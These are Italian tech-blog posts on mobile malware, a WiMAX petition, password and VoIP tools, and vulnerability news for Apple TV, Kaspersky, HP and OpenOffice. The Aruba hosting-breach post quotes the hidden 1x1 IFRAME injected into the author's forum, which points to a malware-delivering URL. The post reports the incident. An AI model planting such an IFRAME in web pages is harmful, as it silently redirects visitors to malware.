Arrestato in Spagna autore di virus per cellulari

La polizia spagnola ha proceduto all’arresto di un 28enne sospettato di aver creato e distribuito un virus a più di 115.000 telefoni cellulari.
Le agenzie di stampa spagnola riportano che la polizia era sulle tracce del sospetto da ben 7 mesi.
Si tratta del primo arresto effettuato in Spagna con un’accusa di questo tipo.

Stando agli investigatori il virus infetta unicamente cellulari con il bluetooth attivato e che montano un sistema operativo Symbian.
Il virus sembra si diffondesse sotto forma di MMS dall’ipotetico contenuto erotico, o a seconda dei casi riportando informazioni sportive o addirittura del software antivirus.
La polizia ha affermato che gli effetti del virus hanno provocato danni per circa sette milioni di euro.

WIMAX Libero! Firmate la petizione!

Siamo già quasi a quota 102.000 firme e credo sia importante diventino sempre di più, onde evitare di ridurci “all’italiana” anche sulla questione WiMax. Non credo sia il caso che le frequenze finiscano in mano ai “soliti noti.
I punti della petizione:

  • che non si proceda alla totale destinazione del gruppo di frequenze interessate dalla tecnologia WI-MAX – 3.4 <–> 3.5 Ghz (inizialmente rilasciati in un gruppo di 35 + 35 Mhz) – o lotti delle stesse, per uso commerciale regolamentato o meno da licenze in obsoleto stile telefonico con conseguente totale chiusura dello spettro radio oggetto di concessione.
  • che venga destinato, da subito, una parte dello spettro radio dichiarato – o che verrà dichiarato – disponibile per la tecnologia a LIBERO USO da parte dei singoli cittadini anche in forma associativa SENZA FINI di LUCRO; ciò regolando naturalmente la concessione d’utilizzo (come già avviene per altre tipologie radiantistiche), senza però che tale regolamentazione possa costituire vincoli di sorta alle caratteristiche intrinseche della tecnologia stessa (diffusione, accesso, interoperabilità, multicanalità, portata, ambito applicativo, ecc…).
  • che la citata porzione di frequenze LIBERE come da precedente punto (2), non sia mai inferiore ad 1/3 dell’intero spettro disponibile; che tale assegnazione sia prioritaria, o comunque non secondaria in termini temporali, rispetto all’eventuale assegnazione di frequenze per uso commerciale.
  • che la citata porzione di frequenze LIBERE come da precedente punto (2), non sia soggetta ad alcun tipo di tassazione diretta od indiretta, ovvero che l’importo della eventuale stessa sia contenuto in importi opportunamente minimi, considerando l’uso personale cui è destinata.
  • che lo Stato Italiano si faccia sostenitore di analoga proposta presso i competenti organi Europei, con lo scopo di coinvolgere l’intera Comunità sul tema WI-MAX e permettere/promuovere così un’eventuale diffusione dello spettro di frequenze libere nell’intero ambito comunitario, realizzando di fatto un primo passo di armonizzazione in tema di “Società dell’Informazione”, nel pieno rispetto degli intenti Comunitari riassunti.

    FIRMATE QUI!

  • Password Manager Portable: Keepass Password Safe

    Oggi mentre cercavo un programmino che fosse un password manager, ma possibilmente “portable”, sono incappato in Keepass Password Safe.
    Si tratta di un programmino veramente semplice da utilizzare e relativamente compatto, può stare tranquillamente anche in un floppy.
    L’idea è quella di avere un gestore per tutte quelle passwords che utilizziamo negli ambienti più disparati, dall’homebanking alle mail, dai siti di e-commerce ai forum che frequentiamo.

    Keepass Password Safe

    La cosa carina di questo software è la presenza di svariati porting di cui una versione per dispositivi mobili: Windows Mobile 6 Classic & Professional, Windows Mobile 5.0 PocketPc & PhoneEdition, PocketPc 2003 (SE).
    Ma non è tutto qui: di Keepass sono disponibili anche le versioni per Linux e MacOs X oltre che PalmOS.
    Personalmente ho testato con successo che il file database delle passwords creato sotto Windows XP, funziona ed è accessibile anche dalla versione PocketPC. 😀
    Sul sito nella sezione downloads presenti anche i sorgenti delle varie versioni.
    Ora non avete più scuse per non portare sempre con voi le vostre passwords in maniera completamente sicura!

    Bugmenot: estensione per Firefox

    Ricordate Bugmenot? Avevo parlato di questo sito verso la metà di aprile.
    La sua utilità sta nel raccogliere una lista di possibili username/password per numerosi siti online, che molto spesso, solo per la lettura o download di contenuti richiedono una noiosa procedura di registrazione.
    Bugmenot una volta inserito l’url del sito che stiamo visitando ci restituisce una lista di possibilità con corrispettiva percentuale di successo (che l’user e pass siano ancora valide).
    Per rendere il nostro processo di “search & login” automatico è disponibile una estensione per Firefox scaricabile da qui.
    In questo modo, una volta installata, se clicchiamo col tasto destro all’interno di un campo username o password e scegliamo dal menu contestuale la voce “Login with Bugmenot”, questi verranno riempiti con l’user/pass relativi al dominio.
    Chiaro che la cosa funziona solo in quei siti per i quali è presente almeno una corrispondenza nell’archivio di Bugmenot.com, tuttavia val la pena sottolineare che questi sono molti e non solo stranieri 😀

    12Voip chiamate gratuite verso i fissi!

    Oggi ho provato assieme a Matteo un software decisamente interessante: 12Voip.
    Questo programmino si inserisce  a fianco dei tantissimi software dedicati al VOIP.
    La cosa simpatica è la possbilità di effettuare chiamate in maniera gratuita dal proprio pc verso numeri fissi.
    Il breve test è consistito in un paio di chiamate della durata di 3-4 minuti.
    Un leggerissimo ritardo ma voce pulita e nessun particolare fruscio di fondo.
    Testato anche con Relakks in funzione 😀
    Software quindi promosso!
    Se vi va di fare una prova veloce questo è il sito di riferimento: 12Voip.

    Chiuso pericoloso bug in Apple TV

    Oltre ad aggiungere il supporto per YouTube, la versione 1.1 di Apple TV chiude una falla piuttosto pericolosa. La vulnerabilità consentiva di effettuare code-injection e eseguire codice remoto sul device.
    Il problema è causato da un bug nell’implementazione Apple dell’Internet Gateway Device Standardized Device Control Protocol, utilizzato dal dispositivo per segnalare, tra le altre cose, al router via UPnP quali porte aprire.
    Sembra si verifichi un buffer overflow durante il processing di determinate pacchetti UPnP: questo consente di scrivere codice nello stack dell’applicazione e eseguirlo.
    Stando all’advisory sembra la falla possa essere sfruttata da remoto: non è ancora chiaro però se quel “remoto” significhi dalla LAN interna oppure proprio da Internet.
    Questo perchè tipicamente i pacchetti UPnP non vengono instradati attraverso Internet.
    I problemi con il protocollo UPnP non sono di certo recenti: molto spesso sono stati riscontrati problemi nel supporto fornito dagli stessi router/firewall visto che non di rado capitava che venissero usati come relay o proxies in maniera “malevole”.
    L’update viene installato in maniera automatica, anche se c’è da ricordare che il meccanismo di software update dell’Apple Tv è programmato per attivarsi una volta alla settimana. L’utente può tuttavia procedere all’aggiornamento in maniera manuale.

    LINK:
    About the security content of Apple TV 1.1, Apple’s security advisory

    Server Aruba sotto attacco: siti web italiani nel mirino!

    In questi ultimi giorni sui blog e sui siti web più disparati, non si è fatto altro che parlare del massiccio attacco subito da numerosi siti web hostati su server Aruba.
    Il modus operandi rispecchia in pieno  quanto avvenuto  lo scorso mese per i sistemi di Hosting Solutions.
    L’intrusione ha infatti consentito a degli attacker di modificare le pagine web di svariati siti web inserendo un IFRAME che effettuasse il redirect degli utenti verso siti web contenenti malware.
    Di seguito riporto il link a tre articoli che spiegano molto bene l’accaduto:
    Server Aruba sotto attacco, allarme in Italia
    Possibile intrusione nei sistemi Aruba
    L’italia sotto pesante attacco malware
    Dalle cose lette qui e in altre pagine sembra sia stato sfruttato un tool automatizzato per lanciare attacchi malware: il software in questione è chiamato MPACK.
    Panda Software ha pubblicato un interessantissimo report che analizza nel dettaglio questo tool: lo potete scaricare qui.

    Il problema ha interessato direttamente anche noi di TechTown. In particolar modo è stato colpito il forum con risultante inserimento del seguente frammento IFRAME:
    <iframe src=”http://zaq-home.org/x/index.php” width=”1″ height=”1″></iframe>
    Del problema mi son accorto grazie alla segnalazione di Kaspersky Internet Security che ha prontamente bloccato il tentativo di download di due malware, nella fattispecie due Trojan.Downloader.

    Trojan blocked by Kaspersky

    Acid ha rimosso il problema che sembra fosse dovuto ad una modifica nel campo templates del database del forum dove sembra sia stato aggiunto il codice, in particolare il board wrappers.
    Abbiamo proceduto anche  ad una verifica dei file dell’intero ftp e cercato di verificare se tutto fosse funzionante.
    Nel frattempo Aruba sembra non dire nulla a riguardo. Penso che una comunicazione via mail globale a tutti i propri utenti sarebbe stata cosa buona e giusta, per informare del possibile pericolo e del possibile coinvolgimento nell’attacco di questo o quel server anche in base alle tante segnalazioni degli utenti.
    Il consiglio è quello di tenere sempre l’antivir aggiornato, meglio se di quelli che hanno la funzionalità integrata di web protection.

    Possibile attacco DoS contro un driver Kaspersky

    I vari prodotti di sicurezza della nota casa Kaspersky lavorano a stretto contatto col sistema operativo, impiegando un driver che tra le altre cose monitora anche le chiamate di sistema di Windows. Il controllo sul passaggio di parametri effettuato dal driver non sembra essere però corretto: ciò apre la porta a possibile attacchi che sfruttando dati non validi portano al crash del sistema.
    Il security provider MatouSec, che ha segnalato il bug, lascia intendere che questa falla potrebbe essere ben più pericolosa di quanto sembri, alludendo a potenziali attacchi di tipo “code injection and execution“.

    I prodotti di sicurezza molto spesso si “agganciano” alle funzioni di sistema con lo scopo di monitorare lo stato di funzionamento ed esecuzione di una macchina.
    Mediante chiamate alla System Service Descriptor Table (SSDT) è possibile determinare quali programmi sono attivi sul computer e cosa stanno facendo: è possibile quindi prendere decisioni appropriate e interrompere per esempio l’esecuzione di un programma che abbia un comportamento “potenzialmente malevole”. Un’altra funzionalità importante è che questo consente di evitare che potenziale malware tenti di intaccare il comportamento dei software di sicurezza stessi.

    Il driver klif.sys si aggancia a svariate syscalls tra cui NtCreateKey, NtCreateProcess, NtCreateProcessEx, NtCreateSection, NtCreateSymbolicLinkObject, NtCreateThread, NtLoadKey2, NtOpenKey e NtOpenProcess.
    Se un programma effettua una chiamata ad una di queste funzioni con parametri non validi, il computer crasha e riparte.

    Un interessante post su RootKit.com di EP_XoFF spiega questa vulnerabilità (presumibilmente piuttosto datata) usando la funzione NtOpenProcess.
    Kaspersky ha reagito alle segnalazioni postando il proprio advisory di sicurezza e annunciando una patch che la compagnia distribuirà a breve tramite il sistema di automatic update.
    Kaspersky ha classificato la minaccia come “low”, poichè richiede che un utente locale esegua il software malevole.
    Stando all’advisory, la vulnerabilità non consentirebbe l’escalation di privilegi o l’esecuzione di codice esterno.
    Le versioni interessate dal problema sembrano essere: Kaspersky Antivirus 6 e 7, Internet Security 6 e 7, Anti-Virus for Windows Workstations 6 e Anti-Virus 6 for Windows Servers, per sistemi operativi da Windows NT a Windows 2003. Sotto Windows Vista sembra che il famigerato crash di sistema non si verifichi.

    Questo annunci conferma la crescente tendenza nella scoperta di bug che interessano software dedicati alla sicurezza. I bug scoperti negli antivirus di F-Secure, Grisoft e Avira (tra gli altri) sono legati a problemi di buffer overflows e format string vulnerabilities.
    Questi fenomeni per la maggior parte sono da imputare il più delle volte ad una carenza per i dettagli durante la fase di programmazione.
    Questo trend non lascia di certo ben sperare, è quindi auspicabile che ci sia un cambiamento di rotta, in virtù del fatto che software come personal firewall e antivirus sono la prima linea di difesa contro la diffusione su larga scala di malware e virus di ogni tipo.

    LINKS:

  • Kaspersky Multiple insufficient argument validation of hooked SSDT function Vulnerability, advisory di MatouSec
  • Exploiting Kaspersky Antivirus 6.0-7.0, bug report di EP_X0FF
  • KLV07-07.Klif.sys calling NtOpenProcess vulnerability, security advisory di Kaspersky
  • I portatili HP sono vulnerabili

    HP ha scoperto delle vulnerabilità che interessano il suo software Help and Support Centre e che potrebbero consentire a utenti malevoli l’esecuzione di codice arbitrario sui sistemi, sfruttando pagine web infette.
    La gravità del problema è che il software è installato di default su tutti i notebook HP e HP Compaq con sistema operativo Windows XP.
    HP non da informazioni particolari in merito alla vulnerabilità, ma menziona soltanto il fatto che le pagine web possono essere usate per provocare un buffer overflow nell’ Help and Support Centre, consentendo di leggere e scrivere in maniera arbitraria files sulla macchina.
    Tutte le versioni precedenti all’attuale 4.4C, che fixa il problema, sono interessate.
    Gli utenti con un laptop HP dovrebbero verificare di aver o meno installato il programma e in caso affermativo, o disinstallarlo o aggiornarlo.
    LINK:
    Help and Support Center, download e changelog sul sito HP

    Problemi per OpenOffice con i file rtf

    Il team di sviluppo di Debian ha rilasciato un advisory di sicurezza che spiega come un file rtf appositamente manipolato possa provocare un buffer overflow in OpenOffice e la possibile esecuzione di codice malevole. Il problema interessa tutte le piattaforme. Stando al FrSIRT, il bug è localizzato nella funzione SwRTFParser::ReadPrtData()all’interno del file filter/rtf/swparrtf.cxx.

    Dopo un’iniziale incertezza circa quali versioni fossero affette dal problema, è stato stabilito che OpenOffice 2.2.1 fixa questa vulnerabilità. StarOffice è esente dal bug a partire dalla versione 8 update 7. Sono disponibili invece gli aggiornamenti per StarOffice 6 e 7.
    Il problema con i file rtf non è l’unico, infatti il team di sviluppo di OpenOffice ha fixato una vulnerabilità di sicurezza che interessa i file dei caratteri (.ttf): il parsing da parte della libreria FreeType non avviene in maniera corretta.
    File appositamente creati possono portare all’esecuzione di codice arbitrario.
    Gli utenti sono quindi caldamente consigliati ad aggiornare a OpenOffice 2.2.1, nel frattempo la raccomandazione è di non aprire file rtf di provenienza sconosciuta.

    LINKS:
    New OpenOffice.org packages fix arbitrary code execution, security advisory del Debian development team